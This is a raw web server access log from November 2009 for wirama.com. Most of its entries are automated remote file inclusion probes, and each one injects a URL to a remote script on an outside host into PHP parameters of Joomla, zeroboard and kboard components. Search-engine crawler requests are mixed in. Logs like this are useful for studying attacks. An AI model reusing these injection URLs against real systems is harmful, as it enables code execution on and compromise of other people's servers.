222.122.46.179 - - [02/Nov/2009:05:31:32 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:32 -0800] "GET /logs/access_090801.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:32 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:33 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:44 -0800] "GET /logs/access_090801.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:44 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:49 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:49 -0800] "GET /logs/access_090801.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:31:49 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:32:01 -0800] "GET /logs/access_090601.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:32:01 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:32:01 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:32:04 -0800] "GET /logs/access_090901.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:32:31 -0800] "GET /logs/access_090801.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:05:33:02 -0800] "GET /logs/access_090901.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.50.85.59 - - [02/Nov/2009:05:34:21 -0800] "GET /logs/access_090330.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.50.85.59 - - [02/Nov/2009:05:34:21 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.50.85.59 - - [02/Nov/2009:05:34:21 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.50.85.59 - - [02/Nov/2009:05:34:39 -0800] "GET /logs/access_090331.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.98.47.66 - - [02/Nov/2009:05:42:22 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.98.47.66 - - [02/Nov/2009:05:42:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.98.47.66 - - [02/Nov/2009:05:42:34 -0800] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.98.47.66 - - [02/Nov/2009:05:43:01 -0800] "GET /logs/access_090801.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aldi.webng.com/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.251.186.141 - - [02/Nov/2009:05:44:02 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.251.186.141 - - [02/Nov/2009:05:44:03 -0800] "GET /logs/scripts.log/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.251.186.141 - - [02/Nov/2009:05:44:03 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.37.202 - - [02/Nov/2009:05:45:25 -0800] "GET /logs/access_090201.log HTTP/1.0" 200 475690 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.97 - - [02/Nov/2009:05:49:34 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.107.182 - - [02/Nov/2009:05:51:32 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
91.192.128.35 - - [02/Nov/2009:05:51:51 -0800] "GET /login.php?dir=http://www.hauguenn.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.192.128.35 - - [02/Nov/2009:05:51:51 -0800] "GET /logs/access_090701.log//login.php?dir=http://www.hauguenn.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.192.128.35 - - [02/Nov/2009:05:51:51 -0800] "GET /logs//login.php?dir=http://www.hauguenn.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [02/Nov/2009:06:13:59 -0800] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
67.195.111.57 - - [02/Nov/2009:06:15:41 -0800] "GET /logs/ HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.207.118 - - [02/Nov/2009:06:25:35 -0800] "GET /logs/ HTTP/1.1" 200 3429 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
125.251.99.2 - - [02/Nov/2009:06:36:24 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.251.99.2 - - [02/Nov/2009:06:36:24 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.251.99.2 - - [02/Nov/2009:06:36:25 -0800] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.198.53.208 - - [02/Nov/2009:06:37:46 -0800] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.198.53.208 - - [02/Nov/2009:06:37:46 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
94.198.53.208 - - [02/Nov/2009:06:37:46 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.251.99.2 - - [02/Nov/2009:06:39:04 -0800] "GET /logs/access_090801.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [02/Nov/2009:06:46:10 -0800] "GET /logs/access_091101.log HTTP/1.0" 200 153555 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
67.195.111.57 - - [02/Nov/2009:06:46:30 -0800] "GET /logs/access_090301.log HTTP/1.0" 200 620059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
154.11.98.150 - - [02/Nov/2009:06:47:24 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [02/Nov/2009:06:47:24 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
154.11.98.150 - - [02/Nov/2009:06:47:24 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.164.124.181 - - [02/Nov/2009:07:00:45 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.164.124.181 - - [02/Nov/2009:07:00:49 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.164.124.181 - - [02/Nov/2009:07:00:49 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.164.124.181 - - [02/Nov/2009:07:01:00 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.164.124.181 - - [02/Nov/2009:07:01:08 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.164.124.181 - - [02/Nov/2009:07:01:09 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.164.124.181 - - [02/Nov/2009:07:01:43 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.164.124.181 - - [02/Nov/2009:07:01:48 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
125.164.124.181 - - [02/Nov/2009:07:02:07 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://resa01.fileave.com/zfx/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
67.195.111.57 - - [02/Nov/2009:07:13:16 -0800] "GET /logs/access_091001.log HTTP/1.0" 200 4739848 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
125.251.99.2 - - [02/Nov/2009:07:30:05 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.251.99.2 - - [02/Nov/2009:07:30:05 -0800] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.251.99.2 - - [02/Nov/2009:07:30:06 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [02/Nov/2009:07:30:20 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [02/Nov/2009:07:30:20 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [02/Nov/2009:07:30:45 -0800] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.251.99.2 - - [02/Nov/2009:07:31:23 -0800] "GET /logs/access_090801.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [02/Nov/2009:07:33:45 -0800] "GET /logs/access_090801.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:46:45 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:46:45 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:46:45 -0800] "GET /logs/access_090331.log//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:48:11 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:48:11 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:48:11 -0800] "GET /logs/access_090801.log//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:48:15 -0800] "GET /logs/access_090331.log//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:49:45 -0800] "GET /logs/access_090801.log//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:49:45 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.46.179 - - [02/Nov/2009:07:49:45 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/rfi1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [02/Nov/2009:08:04:40 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [02/Nov/2009:08:04:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [02/Nov/2009:08:04:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.188.90.49 - - [02/Nov/2009:08:06:52 -0800] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
209.188.90.49 - - [02/Nov/2009:08:06:53 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:32 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:32 -0800] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:32 -0800] "GET /logs/access_090701.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:34 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:34 -0800] "GET /logs/access_090701.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:34 -0800] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:36 -0800] "GET /logs/access_090731.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.218.14 - - [02/Nov/2009:08:09:38 -0800] "GET /logs/access_090731.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.40.68.132 - - [02/Nov/2009:08:09:55 -0800] "GET /logs/access_090501.log//zboard//skin/zero_vote//setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.40.68.132 - - [02/Nov/2009:08:09:55 -0800] "GET /logs//zboard//skin/zero_vote//setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.40.68.132 - - [02/Nov/2009:08:09:55 -0800] "GET /zboard//skin/zero_vote//setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.121 - - [02/Nov/2009:08:12:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.121 - - [02/Nov/2009:08:13:32 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
80.67.26.40 - - [02/Nov/2009:08:15:36 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.26.40 - - [02/Nov/2009:08:15:36 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.26.40 - - [02/Nov/2009:08:15:36 -0800] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
80.67.26.40 - - [02/Nov/2009:08:15:55 -0800] "GET /logs/access_090801.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.103.125.14 - - [02/Nov/2009:08:17:17 -0800] "GET /logs/access_090901.log/write.php?write[use_category]=1&dir=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.103.125.14 - - [02/Nov/2009:08:20:25 -0800] "GET /logs/write.php?write[use_category]=1&dir=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:27:51 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:27:51 -0800] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:27:51 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:27:53 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:27:53 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:27:53 -0800] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:28:31 -0800] "GET /logs/access_090801.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:28:36 -0800] "GET /logs/access_090801.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [02/Nov/2009:08:29:01 -0800] "GET /logs/access_090401.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.47 - - [02/Nov/2009:08:31:43 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [02/Nov/2009:08:31:45 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
122.199.140.158 - - [02/Nov/2009:08:43:17 -0800] "GET /setup.php?%20dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [02/Nov/2009:08:43:17 -0800] "GET /logs/access_090331.log//setup.php?%20dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [02/Nov/2009:08:43:17 -0800] "GET /logs//setup.php?%20dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
